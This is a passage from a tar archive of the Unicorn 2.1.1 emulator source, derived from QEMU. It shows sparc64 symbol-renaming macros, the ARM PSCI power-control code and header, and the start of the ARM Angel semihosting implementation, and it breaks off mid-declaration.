helper_fmuld helper_fmuld_sparc64 #define helper_fmulq helper_fmulq_sparc64 #define helper_fdivs helper_fdivs_sparc64 #define helper_fdivd helper_fdivd_sparc64 #define helper_fdivq helper_fdivq_sparc64 #define helper_fsmuld helper_fsmuld_sparc64 #define helper_fsmulq helper_fsmulq_sparc64 #define helper_fdmulq helper_fdmulq_sparc64 #define helper_fnegs helper_fnegs_sparc64 #define helper_fnegd helper_fnegd_sparc64 #define helper_fnegq helper_fnegq_sparc64 #define helper_fitos helper_fitos_sparc64 #define helper_fitod helper_fitod_sparc64 #define helper_fitoq helper_fitoq_sparc64 #define helper_fxtos helper_fxtos_sparc64 #define helper_fxtod helper_fxtod_sparc64 #define helper_fxtoq helper_fxtoq_sparc64 #define helper_fdtos helper_fdtos_sparc64 #define helper_fstod helper_fstod_sparc64 #define helper_fqtos helper_fqtos_sparc64 #define helper_fstoq helper_fstoq_sparc64 #define helper_fqtod helper_fqtod_sparc64 #define helper_fdtoq helper_fdtoq_sparc64 #define helper_fstoi helper_fstoi_sparc64 #define helper_fdtoi helper_fdtoi_sparc64 #define helper_fqtoi helper_fqtoi_sparc64 #define helper_fstox helper_fstox_sparc64 #define helper_fdtox helper_fdtox_sparc64 #define helper_fqtox helper_fqtox_sparc64 #define helper_fabss helper_fabss_sparc64 #define helper_fabsd helper_fabsd_sparc64 #define helper_fabsq helper_fabsq_sparc64 #define helper_fsqrts helper_fsqrts_sparc64 #define helper_fsqrtd helper_fsqrtd_sparc64 #define helper_fsqrtq helper_fsqrtq_sparc64 #define helper_fcmps helper_fcmps_sparc64 #define helper_fcmpd helper_fcmpd_sparc64 #define helper_fcmpes helper_fcmpes_sparc64 #define helper_fcmped helper_fcmped_sparc64 #define helper_fcmpq helper_fcmpq_sparc64 #define helper_fcmpeq helper_fcmpeq_sparc64 #define helper_fcmps_fcc1 helper_fcmps_fcc1_sparc64 #define helper_fcmpd_fcc1 helper_fcmpd_fcc1_sparc64 #define helper_fcmpq_fcc1 helper_fcmpq_fcc1_sparc64 #define helper_fcmps_fcc2 helper_fcmps_fcc2_sparc64 #define helper_fcmpd_fcc2 helper_fcmpd_fcc2_sparc64 #define helper_fcmpq_fcc2 helper_fcmpq_fcc2_sparc64 #define helper_fcmps_fcc3 helper_fcmps_fcc3_sparc64 #define helper_fcmpd_fcc3 helper_fcmpd_fcc3_sparc64 #define helper_fcmpq_fcc3 helper_fcmpq_fcc3_sparc64 #define helper_fcmpes_fcc1 helper_fcmpes_fcc1_sparc64 #define helper_fcmped_fcc1 helper_fcmped_fcc1_sparc64 #define helper_fcmpeq_fcc1 helper_fcmpeq_fcc1_sparc64 #define helper_fcmpes_fcc2 helper_fcmpes_fcc2_sparc64 #define helper_fcmped_fcc2 helper_fcmped_fcc2_sparc64 #define helper_fcmpeq_fcc2 helper_fcmpeq_fcc2_sparc64 #define helper_fcmpes_fcc3 helper_fcmpes_fcc3_sparc64 #define helper_fcmped_fcc3 helper_fcmped_fcc3_sparc64 #define helper_fcmpeq_fcc3 helper_fcmpeq_fcc3_sparc64 #define helper_ldfsr helper_ldfsr_sparc64 #define helper_ldxfsr helper_ldxfsr_sparc64 #define cpu_raise_exception_ra cpu_raise_exception_ra_sparc64 #define helper_raise_exception helper_raise_exception_sparc64 #define helper_debug helper_debug_sparc64 #define helper_tick_set_count helper_tick_set_count_sparc64 #define helper_tick_get_count helper_tick_get_count_sparc64 #define helper_tick_set_limit helper_tick_set_limit_sparc64 #define helper_udiv helper_udiv_sparc64 #define helper_udiv_cc helper_udiv_cc_sparc64 #define helper_sdiv helper_sdiv_sparc64 #define helper_sdiv_cc helper_sdiv_cc_sparc64 #define helper_sdivx helper_sdivx_sparc64 #define helper_udivx helper_udivx_sparc64 #define helper_taddcctv helper_taddcctv_sparc64 #define helper_tsubcctv helper_tsubcctv_sparc64 #define helper_power_down helper_power_down_sparc64 #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc64 #define leon3_irq_manager leon3_irq_manager_sparc64 #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc64 #define cpu_tsptr cpu_tsptr_sparc64 #define helper_set_softint helper_set_softint_sparc64 #define helper_clear_softint helper_clear_softint_sparc64 #define helper_write_softint helper_write_softint_sparc64 #define helper_check_align helper_check_align_sparc64 #define helper_ld_asi helper_ld_asi_sparc64 #define helper_st_asi helper_st_asi_sparc64 #define sparc_cpu_do_transaction_failed sparc_cpu_do_transaction_failed_sparc64 #define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc64 #define sparc_cpu_tlb_fill sparc_cpu_tlb_fill_sparc64 #define mmu_probe mmu_probe_sparc64 #define sparc_cpu_memory_rw_debug sparc_cpu_memory_rw_debug_sparc64 #define cpu_get_phys_page_nofault cpu_get_phys_page_nofault_sparc64 #define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc64 #define gen_intermediate_code gen_intermediate_code_sparc64 #define sparc_tcg_init sparc_tcg_init_sparc64 #define restore_state_to_opc restore_state_to_opc_sparc64 #define cpu_set_cwp cpu_set_cwp_sparc64 #define cpu_get_psr cpu_get_psr_sparc64 #define cpu_put_psr_raw cpu_put_psr_raw_sparc64 #define cpu_put_psr cpu_put_psr_sparc64 #define cpu_cwp_inc cpu_cwp_inc_sparc64 #define cpu_cwp_dec cpu_cwp_dec_sparc64 #define helper_rett helper_rett_sparc64 #define helper_save helper_save_sparc64 #define helper_restore helper_restore_sparc64 #define helper_flushw helper_flushw_sparc64 #define helper_saved helper_saved_sparc64 #define helper_restored helper_restored_sparc64 #define helper_wrpsr helper_wrpsr_sparc64 #define helper_rdpsr helper_rdpsr_sparc64 #define cpu_get_ccr cpu_get_ccr_sparc64 #define cpu_put_ccr cpu_put_ccr_sparc64 #define cpu_get_cwp64 cpu_get_cwp64_sparc64 #define cpu_put_cwp64 cpu_put_cwp64_sparc64 #define helper_rdccr helper_rdccr_sparc64 #define helper_wrccr helper_wrccr_sparc64 #define helper_rdcwp helper_rdcwp_sparc64 #define helper_wrcwp helper_wrcwp_sparc64 #define cpu_gl_switch_gregs cpu_gl_switch_gregs_sparc64 #define helper_wrgl helper_wrgl_sparc64 #define cpu_change_pstate cpu_change_pstate_sparc64 #define helper_wrpstate helper_wrpstate_sparc64 #define helper_wrpil helper_wrpil_sparc64 #define helper_done helper_done_sparc64 #define helper_retry helper_retry_sparc64 #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/��������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015441�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016220�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/README����������������������������������������������������������������0000664�0000000�0000000�00000000314�14675241067�0017076�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������code under arm/ is from arm-softmmu/target/arm/*.inc.c code under aarch64/ is from aarch64-softmmu/target/aarch64/*.inc.c WARNING: these code are autogen from scripts/decodetree.py, DO NOT modify them. ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/arm-powerctl.c��������������������������������������������������������0000664�0000000�0000000�00000025377�14675241067�0021016�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU support -- ARM Power Control specific functions. * * Copyright (c) 2016 Jean-Christophe Dubois * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-qom.h" #include "internals.h" #include "arm-powerctl.h" #include "qemu/log.h" #ifndef DEBUG_ARM_POWERCTL #define DEBUG_ARM_POWERCTL 0 #endif #define DPRINTF(fmt, args...) \ do { \ if (DEBUG_ARM_POWERCTL) { \ fprintf(stderr, "[ARM]%s: " fmt , __func__, ##args); \ } \ } while (0) CPUState *arm_get_cpu_by_id(uint64_t id) { CPUState *cpu; DPRINTF("cpu %" PRId64 "\n", id); CPU_FOREACH(cpu) { ARMCPU *armcpu = ARM_CPU(cpu); if (armcpu->mp_affinity == id) { return cpu; } } qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: Requesting unknown CPU %" PRId64 "\n", __func__, id); return NULL; } struct CpuOnInfo { uint64_t entry; uint64_t context_id; uint32_t target_el; bool target_aa64; }; static void arm_set_cpu_on_async_work(CPUState *target_cpu_state, run_on_cpu_data data) { ARMCPU *target_cpu = ARM_CPU(target_cpu_state); struct CpuOnInfo *info = (struct CpuOnInfo *) data.host_ptr; /* Initialize the cpu we are turning on */ cpu_reset(target_cpu_state); target_cpu_state->halted = 0; if (info->target_aa64) { if ((info->target_el < 3) && arm_feature(&target_cpu->env, ARM_FEATURE_EL3)) { /* * As target mode is AArch64, we need to set lower * exception level (the requested level 2) to AArch64 */ target_cpu->env.cp15.scr_el3 |= SCR_RW; } if ((info->target_el < 2) && arm_feature(&target_cpu->env, ARM_FEATURE_EL2)) { /* * As target mode is AArch64, we need to set lower * exception level (the requested level 1) to AArch64 */ target_cpu->env.cp15.hcr_el2 |= HCR_RW; } target_cpu->env.pstate = aarch64_pstate_mode(info->target_el, true); } else { /* We are requested to boot in AArch32 mode */ static const uint32_t mode_for_el[] = { 0, ARM_CPU_MODE_SVC, ARM_CPU_MODE_HYP, ARM_CPU_MODE_SVC }; cpsr_write(&target_cpu->env, mode_for_el[info->target_el], CPSR_M, CPSRWriteRaw); } if (info->target_el == 3) { /* Processor is in secure mode */ target_cpu->env.cp15.scr_el3 &= ~SCR_NS; } else { /* Processor is not in secure mode */ target_cpu->env.cp15.scr_el3 |= SCR_NS; /* Set NSACR.{CP11,CP10} so NS can access the FPU */ target_cpu->env.cp15.nsacr |= 3 << 10; /* * If QEMU is providing the equivalent of EL3 firmware, then we need * to make sure a CPU targeting EL2 comes out of reset with a * functional HVC insn. */ if (arm_feature(&target_cpu->env, ARM_FEATURE_EL3) && info->target_el == 2) { target_cpu->env.cp15.scr_el3 |= SCR_HCE; } } /* We check if the started CPU is now at the correct level */ assert(info->target_el == arm_current_el(&target_cpu->env)); if (info->target_aa64) { target_cpu->env.xregs[0] = info->context_id; } else { target_cpu->env.regs[0] = info->context_id; } /* CP15 update requires rebuilding hflags */ arm_rebuild_hflags(&target_cpu->env); /* Start the new CPU at the requested address */ cpu_set_pc(target_cpu_state, info->entry); g_free(info); /* Finally set the power status */ target_cpu->power_state = PSCI_ON; } int arm_set_cpu_on(uint64_t cpuid, uint64_t entry, uint64_t context_id, uint32_t target_el, bool target_aa64) { CPUState *target_cpu_state; ARMCPU *target_cpu; struct CpuOnInfo *info; DPRINTF("cpu %" PRId64 " (EL %d, %s) @ 0x%" PRIx64 " with R0 = 0x%" PRIx64 "\n", cpuid, target_el, target_aa64 ? "aarch64" : "aarch32", entry, context_id); /* requested EL level need to be in the 1 to 3 range */ assert((target_el > 0) && (target_el < 4)); if (target_aa64 && (entry & 3)) { /* * if we are booting in AArch64 mode then "entry" needs to be 4 bytes * aligned. */ return QEMU_ARM_POWERCTL_INVALID_PARAM; } /* Retrieve the cpu we are powering up */ target_cpu_state = arm_get_cpu_by_id(cpuid); if (!target_cpu_state) { /* The cpu was not found */ return QEMU_ARM_POWERCTL_INVALID_PARAM; } target_cpu = ARM_CPU(target_cpu_state); if (target_cpu->power_state == PSCI_ON) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is already on\n", __func__, cpuid); return QEMU_ARM_POWERCTL_ALREADY_ON; } /* * The newly brought CPU is requested to enter the exception level * "target_el" and be in the requested mode (AArch64 or AArch32). */ if (((target_el == 3) && !arm_feature(&target_cpu->env, ARM_FEATURE_EL3)) || ((target_el == 2) && !arm_feature(&target_cpu->env, ARM_FEATURE_EL2))) { /* * The CPU does not support requested level */ return QEMU_ARM_POWERCTL_INVALID_PARAM; } if (!target_aa64 && arm_feature(&target_cpu->env, ARM_FEATURE_AARCH64)) { /* * For now we don't support booting an AArch64 CPU in AArch32 mode * TODO: We should add this support later */ qemu_log_mask(LOG_UNIMP, "[ARM]%s: Starting AArch64 CPU %" PRId64 " in AArch32 mode is not supported yet\n", __func__, cpuid); return QEMU_ARM_POWERCTL_INVALID_PARAM; } /* * If another CPU has powered the target on we are in the state * ON_PENDING and additional attempts to power on the CPU should * fail (see 6.6 Implementation CPU_ON/CPU_OFF races in the PSCI * spec) */ if (target_cpu->power_state == PSCI_ON_PENDING) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is already powering on\n", __func__, cpuid); return QEMU_ARM_POWERCTL_ON_PENDING; } /* To avoid racing with a CPU we are just kicking off we do the * final bit of preparation for the work in the target CPUs * context. */ info = g_new(struct CpuOnInfo, 1); info->entry = entry; info->context_id = context_id; info->target_el = target_el; info->target_aa64 = target_aa64; async_run_on_cpu(target_cpu_state, arm_set_cpu_on_async_work, RUN_ON_CPU_HOST_PTR(info)); /* We are good to go */ return QEMU_ARM_POWERCTL_RET_SUCCESS; } static void arm_set_cpu_on_and_reset_async_work(CPUState *target_cpu_state, run_on_cpu_data data) { ARMCPU *target_cpu = ARM_CPU(target_cpu_state); /* Initialize the cpu we are turning on */ cpu_reset(target_cpu_state); target_cpu_state->halted = 0; /* Finally set the power status */ target_cpu->power_state = PSCI_ON; } int arm_set_cpu_on_and_reset(uint64_t cpuid) { CPUState *target_cpu_state; ARMCPU *target_cpu; /* Retrieve the cpu we are powering up */ target_cpu_state = arm_get_cpu_by_id(cpuid); if (!target_cpu_state) { /* The cpu was not found */ return QEMU_ARM_POWERCTL_INVALID_PARAM; } target_cpu = ARM_CPU(target_cpu_state); if (target_cpu->power_state == PSCI_ON) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is already on\n", __func__, cpuid); return QEMU_ARM_POWERCTL_ALREADY_ON; } /* * If another CPU has powered the target on we are in the state * ON_PENDING and additional attempts to power on the CPU should * fail (see 6.6 Implementation CPU_ON/CPU_OFF races in the PSCI * spec) */ if (target_cpu->power_state == PSCI_ON_PENDING) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is already powering on\n", __func__, cpuid); return QEMU_ARM_POWERCTL_ON_PENDING; } async_run_on_cpu(target_cpu_state, arm_set_cpu_on_and_reset_async_work, RUN_ON_CPU_NULL); /* We are good to go */ return QEMU_ARM_POWERCTL_RET_SUCCESS; } static void arm_set_cpu_off_async_work(CPUState *target_cpu_state, run_on_cpu_data data) { ARMCPU *target_cpu = ARM_CPU(target_cpu_state); target_cpu->power_state = PSCI_OFF; target_cpu_state->halted = 1; target_cpu_state->exception_index = EXCP_HLT; } int arm_set_cpu_off(uint64_t cpuid) { CPUState *target_cpu_state; ARMCPU *target_cpu; DPRINTF("cpu %" PRId64 "\n", cpuid); /* change to the cpu we are powering up */ target_cpu_state = arm_get_cpu_by_id(cpuid); if (!target_cpu_state) { return QEMU_ARM_POWERCTL_INVALID_PARAM; } target_cpu = ARM_CPU(target_cpu_state); if (target_cpu->power_state == PSCI_OFF) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is already off\n", __func__, cpuid); return QEMU_ARM_POWERCTL_IS_OFF; } /* Queue work to run under the target vCPUs context */ async_run_on_cpu(target_cpu_state, arm_set_cpu_off_async_work, RUN_ON_CPU_NULL); return QEMU_ARM_POWERCTL_RET_SUCCESS; } static void arm_reset_cpu_async_work(CPUState *target_cpu_state, run_on_cpu_data data) { /* Reset the cpu */ cpu_reset(target_cpu_state); } int arm_reset_cpu(uint64_t cpuid) { CPUState *target_cpu_state; ARMCPU *target_cpu; DPRINTF("cpu %" PRId64 "\n", cpuid); /* change to the cpu we are resetting */ target_cpu_state = arm_get_cpu_by_id(cpuid); if (!target_cpu_state) { return QEMU_ARM_POWERCTL_INVALID_PARAM; } target_cpu = ARM_CPU(target_cpu_state); if (target_cpu->power_state == PSCI_OFF) { qemu_log_mask(LOG_GUEST_ERROR, "[ARM]%s: CPU %" PRId64 " is off\n", __func__, cpuid); return QEMU_ARM_POWERCTL_IS_OFF; } /* Queue work to run under the target vCPUs context */ async_run_on_cpu(target_cpu_state, arm_reset_cpu_async_work, RUN_ON_CPU_NULL); return QEMU_ARM_POWERCTL_RET_SUCCESS; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/arm-powerctl.h��������������������������������������������������������0000664�0000000�0000000�00000005733�14675241067�0021015�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU support -- ARM Power Control specific functions. * * Copyright (c) 2016 Jean-Christophe Dubois * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #ifndef QEMU_ARM_POWERCTL_H #define QEMU_ARM_POWERCTL_H #include "kvm-consts.h" #define QEMU_ARM_POWERCTL_RET_SUCCESS QEMU_PSCI_RET_SUCCESS #define QEMU_ARM_POWERCTL_INVALID_PARAM QEMU_PSCI_RET_INVALID_PARAMS #define QEMU_ARM_POWERCTL_ALREADY_ON QEMU_PSCI_RET_ALREADY_ON #define QEMU_ARM_POWERCTL_IS_OFF QEMU_PSCI_RET_DENIED #define QEMU_ARM_POWERCTL_ON_PENDING QEMU_PSCI_RET_ON_PENDING /* * arm_get_cpu_by_id: * @cpuid: the id of the CPU we want to retrieve the state * * Retrieve a CPUState object from its CPU ID provided in @cpuid. * * Returns: a pointer to the CPUState structure of the requested CPU. */ CPUState *arm_get_cpu_by_id(uint64_t cpuid); /* * arm_set_cpu_on: * @cpuid: the id of the CPU we want to start/wake up. * @entry: the address the CPU shall start from. * @context_id: the value to put in r0/x0. * @target_el: The desired exception level. * @target_aa64: 1 if the requested mode is AArch64. 0 otherwise. * * Start the cpu designated by @cpuid in @target_el exception level. The mode * shall be AArch64 if @target_aa64 is set to 1. Otherwise the mode is * AArch32. The CPU shall start at @entry with @context_id in r0/x0. * * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success. * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided. * QEMU_ARM_POWERCTL_ALREADY_ON if the CPU was already started. * QEMU_ARM_POWERCTL_ON_PENDING if the CPU is still powering up */ int arm_set_cpu_on(uint64_t cpuid, uint64_t entry, uint64_t context_id, uint32_t target_el, bool target_aa64); /* * arm_set_cpu_off: * @cpuid: the id of the CPU we want to stop/shut down. * * Stop the cpu designated by @cpuid. * * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success. * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided. * QEMU_ARM_POWERCTL_IS_OFF if CPU is already off */ int arm_set_cpu_off(uint64_t cpuid); /* * arm_reset_cpu: * @cpuid: the id of the CPU we want to reset. * * Reset the cpu designated by @cpuid. * * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success. * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided. * QEMU_ARM_POWERCTL_IS_OFF if CPU is off */ int arm_reset_cpu(uint64_t cpuid); /* * arm_set_cpu_on_and_reset: * @cpuid: the id of the CPU we want to star * * Start the cpu designated by @cpuid and put it through its normal * CPU reset process. The CPU will start in the way it is architected * to start after a power-on reset. * * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success. * QEMU_ARM_POWERCTL_INVALID_PARAM if there is no CPU with that ID. * QEMU_ARM_POWERCTL_ALREADY_ON if the CPU is already on. * QEMU_ARM_POWERCTL_ON_PENDING if the CPU is already partway through * powering on. */ int arm_set_cpu_on_and_reset(uint64_t cpuid); #endif �������������������������������������unicorn-2.1.1/qemu/target/arm/arm-semi.c������������������������������������������������������������0000664�0000000�0000000�00000073073�14675241067�0020110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Arm "Angel" semihosting syscalls * * Copyright (c) 2005, 2007 CodeSourcery. * Copyright (c) 2019 Linaro * Written by Paul Brook. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. * * ARM Semihosting is documented in: * Semihosting for AArch32 and AArch64 Release 2.0 * https://static.docs.arm.com/100863/0200/semihosting.pdf */ #include "qemu/osdep.h" #include "cpu.h" //#include "hw/semihosting/semihost.h" //#include "hw/semihosting/console.h" #include "qemu/log.h" #include "exec/gdbstub.h" #include "qemu/cutils.h" #define TARGET_SYS_OPEN 0x01 #define TARGET_SYS_CLOSE 0x02 #define TARGET_SYS_WRITEC 0x03 #define TARGET_SYS_WRITE0 0x04 #define TARGET_SYS_WRITE 0x05 #define TARGET_SYS_READ 0x06 #define TARGET_SYS_READC 0x07 #define TARGET_SYS_ISTTY 0x09 #define TARGET_SYS_SEEK 0x0a #define TARGET_SYS_FLEN 0x0c #define TARGET_SYS_TMPNAM 0x0d #define TARGET_SYS_REMOVE 0x0e #define TARGET_SYS_RENAME 0x0f #define TARGET_SYS_CLOCK 0x10 #define TARGET_SYS_TIME 0x11 #define TARGET_SYS_SYSTEM 0x12 #define TARGET_SYS_ERRNO 0x13 #define TARGET_SYS_GET_CMDLINE 0x15 #define TARGET_SYS_HEAPINFO 0x16 #define TARGET_SYS_EXIT 0x18 #define TARGET_SYS_SYNCCACHE 0x19 #define TARGET_SYS_EXIT_EXTENDED 0x20 /* ADP_Stopped_ApplicationExit is used for exit(0), * anything else is implemented as exit(1) */ #define ADP_Stopped_ApplicationExit (0x20026) #ifndef O_BINARY #define O_BINARY 0 #endif #define GDB_O_RDONLY 0x000 #define GDB_O_WRONLY 0x001 #define GDB_O_RDWR 0x002 #define GDB_O_APPEND 0x008 #define GDB_O_CREAT 0x200 #define GDB_O_TRUNC 0x400 #define GDB_O_BINARY 0 static int gdb_open_modeflags[12] = { GDB_O_RDONLY, GDB_O_RDONLY | GDB_O_BINARY, GDB_O_RDWR, GDB_O_RDWR | GDB_O_BINARY, GDB_O_WRONLY | GDB_O_CREAT | GDB_O_TRUNC, GDB_O_WRONLY | GDB_O_CREAT | GDB_O_TRUNC | GDB_O_BINARY, GDB_O_RDWR | GDB_O_CREAT | GDB_O_TRUNC, GDB_O_RDWR | GDB_O_CREAT | GDB_O_TRUNC | GDB_O_BINARY, GDB_O_WRONLY | GDB_O_CREAT | GDB_O_APPEND, GDB_O_WRONLY | GDB_O_CREAT | GDB_O_APPEND | GDB_O_BINARY, GDB_O_RDWR | GDB_O_CREAT | GDB_O_APPEND, GDB_O_RDWR | GDB_O_CREAT | GDB_O_APPEND | GDB_O_BINARY }; static int open_modeflags[12] = { O_RDONLY, O_RDONLY | O_BINARY, O_RDWR, O_RDWR | O_BINARY, O_WRONLY | O_CREAT | O_TRUNC, O_WRONLY | O_CREAT | O_TRUNC | O_BINARY, O_RDWR | O_CREAT | O_TRUNC, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, O_WRONLY | O_CREAT | O_APPEND, O_WRONLY | O_CREAT | O_APPEND | O_BINARY, O_RDWR | O_CREAT | O_APPEND, O_RDWR | O_CREAT | O_APPEND | O_BINARY }; typedef enum GuestFDType { GuestFDUnused = 0, GuestFDHost = 1, GuestFDGDB = 2, GuestFDFeatureFile = 3, } GuestFDType; /* * Guest file descriptors are integer indexes into an array of * these structures (we will dynamically resize as necessary). */ typedef struct GuestFD { GuestFDType type; union { int hostfd; target_ulong featurefile_offset; }; } GuestFD; static GArray *guestfd_array; /* * Allocate a new guest file descriptor and return it; if we * couldn't allocate a new fd then return -1. * This is a fairly simplistic implementation because we don't * expect that most semihosting guest programs will make very * heavy use of opening and closing fds. */ static int alloc_guestfd(void) { guint i; if (!guestfd_array) { /* New entries zero-initialized, i.e. type GuestFDUnused */ guestfd_array = g_array_new(FALSE, TRUE, sizeof(GuestFD)); } /* SYS_OPEN should return nonzero handle on success. Start guestfd from 1 */ for (i = 1; i < guestfd_array->len; i++) { GuestFD *gf = &g_array_index(guestfd_array, GuestFD, i); if (gf->type == GuestFDUnused) { return i; } } /* All elements already in use: expand the array */ g_array_set_size(guestfd_array, i + 1); return i; } /* * Look up the guestfd in the data structure; return NULL * for out of bounds, but don't check whether the slot is unused. * This is used internally by the other guestfd functions. */ static GuestFD *do_get_guestfd(int guestfd) { if (!guestfd_array) { return NULL; } if (guestfd <= 0 || guestfd >= guestfd_array->len) { return NULL; } return &g_array_index(guestfd_array, GuestFD, guestfd); } /* * Associate the specified guest fd (which must have been * allocated via alloc_fd() and not previously used) with * the specified host/gdb fd. */ static void associate_guestfd(int guestfd, int hostfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = use_gdb_syscalls() ? GuestFDGDB : GuestFDHost; gf->hostfd = hostfd; } /* * Deallocate the specified guest file descriptor. This doesn't * close the host fd, it merely undoes the work of alloc_fd(). */ static void dealloc_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = GuestFDUnused; } /* * Given a guest file descriptor, get the associated struct. * If the fd is not valid, return NULL. This is the function * used by the various semihosting calls to validate a handle * from the guest. * Note: calling alloc_guestfd() or dealloc_guestfd() will * invalidate any GuestFD* obtained by calling this function. */ static GuestFD *get_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); if (!gf || gf->type == GuestFDUnused) { return NULL; } return gf; } /* * The semihosting API has no concept of its errno being thread-safe, * as the API design predates SMP CPUs and was intended as a simple * real-hardware set of debug functionality. For QEMU, we make the * errno be per-thread in linux-user mode; in softmmu it is a simple * global, and we assume that the guest takes care of avoiding any races. */ static target_ulong syscall_err; #include "exec/softmmu-semi.h" static inline uint32_t set_swi_errno(CPUARMState *env, uint32_t code) { if (code == (uint32_t)-1) { syscall_err = errno; } return code; } static inline uint32_t get_swi_errno(CPUARMState *env) { return syscall_err; } static target_ulong arm_semi_syscall_len; static void arm_semi_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; target_ulong reg0 = is_a64(env) ? env->xregs[0] : env->regs[0]; if (ret == (target_ulong)-1) { errno = err; set_swi_errno(env, -1); reg0 = ret; } else { /* Fixup syscalls that use nonstardard return conventions. */ switch (reg0) { case TARGET_SYS_WRITE: case TARGET_SYS_READ: reg0 = arm_semi_syscall_len - ret; break; case TARGET_SYS_SEEK: reg0 = 0; break; default: reg0 = ret; break; } } if (is_a64(env)) { env->xregs[0] = reg0; } else { env->regs[0] = reg0; } } static target_ulong arm_flen_buf(ARMCPU *cpu) { /* Return an address in target memory of 64 bytes where the remote * gdb should write its stat struct. (The format of this structure * is defined by GDB's remote protocol and is not target-specific.) * We put this on the guest's stack just below SP. */ CPUARMState *env = &cpu->env; target_ulong sp; if (is_a64(env)) { sp = env->xregs[31]; } else { sp = env->regs[13]; } return sp - 64; } static void arm_semi_flen_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* The size is always stored in big-endian order, extract the value. We assume the size always fit in 32 bits. */ uint32_t size; cpu_memory_rw_debug(cs, arm_flen_buf(cpu) + 32, (uint8_t *)&size, 4, 0); size = be32_to_cpu(size); if (is_a64(env)) { env->xregs[0] = size; } else { env->regs[0] = size; } errno = err; set_swi_errno(env, -1); } static int arm_semi_open_guestfd; static void arm_semi_open_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; if (ret == (target_ulong)-1) { errno = err; set_swi_errno(env, -1); dealloc_guestfd(arm_semi_open_guestfd); } else { associate_guestfd(arm_semi_open_guestfd, ret); ret = arm_semi_open_guestfd; } if (is_a64(env)) { env->xregs[0] = ret; } else { env->regs[0] = ret; } } static target_ulong arm_gdb_syscall(ARMCPU *cpu, gdb_syscall_complete_cb cb, const char *fmt, ...) { va_list va; CPUARMState *env = &cpu->env; va_start(va, fmt); gdb_do_syscallv(cb, fmt, va); va_end(va); /* * FIXME: in softmmu mode, the gdbstub will schedule our callback * to occur, but will not actually call it to complete the syscall * until after this function has returned and we are back in the * CPU main loop. Therefore callers to this function must not * do anything with its return value, because it is not necessarily * the result of the syscall, but could just be the old value of X0. * The only thing safe to do with this is that the callers of * do_arm_semihosting() will write it straight back into X0. * (In linux-user mode, the callback will have happened before * gdb_do_syscallv() returns.) * * We should tidy this up so neither this function nor * do_arm_semihosting() return a value, so the mistake of * doing something with the return value is not possible to make. */ return is_a64(env) ? env->xregs[0] : env->regs[0]; } /* * Types for functions implementing various semihosting calls * for specific types of guest file descriptor. These must all * do the work and return the required return value for the guest, * setting the guest errno if appropriate. */ typedef uint32_t sys_closefn(ARMCPU *cpu, GuestFD *gf); typedef uint32_t sys_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len); typedef uint32_t sys_readfn(ARMCPU 